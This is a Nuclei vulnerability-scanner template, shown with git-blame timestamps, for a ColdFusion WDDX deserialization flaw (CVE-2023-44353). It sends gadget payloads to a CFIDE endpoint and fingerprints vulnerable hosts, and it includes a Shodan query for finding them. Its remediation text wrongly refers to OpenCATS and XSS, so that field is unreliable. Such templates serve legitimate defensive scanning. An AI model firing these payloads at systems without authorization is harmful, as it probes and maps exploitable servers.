nuclei-templates/http/cves/2023/CVE-2023-44353.yaml

82 lines
3.7 KiB
YAML
Raw Normal View History

id: CVE-2023-44353
info:
2024-01-06 20:24:38 +00:00
name: Adobe ColdFusion WDDX Deserialization Gadgets
author: salts
severity: critical
description: |
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
2024-01-06 20:24:38 +00:00
remediation: |
To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
reference:
2024-01-06 20:24:38 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-44353
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
2024-01-06 20:24:38 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2024-01-06 20:24:38 +00:00
cve-id: CVE-2023-44353
cwe-id: CWE-502
epss-score: 0.00456
epss-percentile: 0.72579
2024-01-06 20:24:38 +00:00
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,adobe,coldfusion,deserialization,xss
variables:
windows_known_path: "C:\\Windows\\"
windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"
2024-01-06 20:27:54 +00:00
linux_known_path: "/etc/"
linux_bad_path: "/thesecretcowlevelisreal/"
2024-01-06 20:24:38 +00:00
http:
- raw:
- |
2024-01-08 07:13:17 +00:00
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
2024-01-06 20:27:54 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2024-01-06 20:30:12 +00:00
2024-01-06 20:24:38 +00:00
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>
- |
2024-01-08 07:13:17 +00:00
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
2024-01-06 20:27:54 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2024-01-06 20:30:12 +00:00
2024-01-06 20:24:38 +00:00
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>
- |
2024-01-08 07:13:17 +00:00
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
2024-01-06 20:27:54 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2024-01-06 20:24:38 +00:00
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>
- |
2024-01-08 07:13:17 +00:00
POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
2024-01-06 20:27:54 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2024-01-06 20:24:38 +00:00
argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>
matchers-condition: or
matchers:
- type: dsl
2024-01-06 20:24:38 +00:00
name: windows
2024-01-06 20:27:54 +00:00
dsl:
2024-01-06 20:24:38 +00:00
- "status_code_1 == 500 && status_code_2 == 404"
- contains(body_1, "coldfusion.runtime")
condition: and
- type: dsl
2024-01-06 20:24:38 +00:00
name: linux
2024-01-06 20:27:54 +00:00
dsl:
2024-01-06 20:24:38 +00:00
- "status_code_3 == 500 && status_code_4 == 404"
- contains(body_3, "coldfusion.runtime")
condition: and
# digest: 4a0a004730450220047bd272fa85a31954610677163c6d46bc1bc7e4cbe15197f0a08be5f0919fcf022100a0fbfd66e5f0e75667e67d3994d5f3fda3fa376e5401a3eee32f69955eb0e4e8:922c64590222798bb761d5b6d8e72950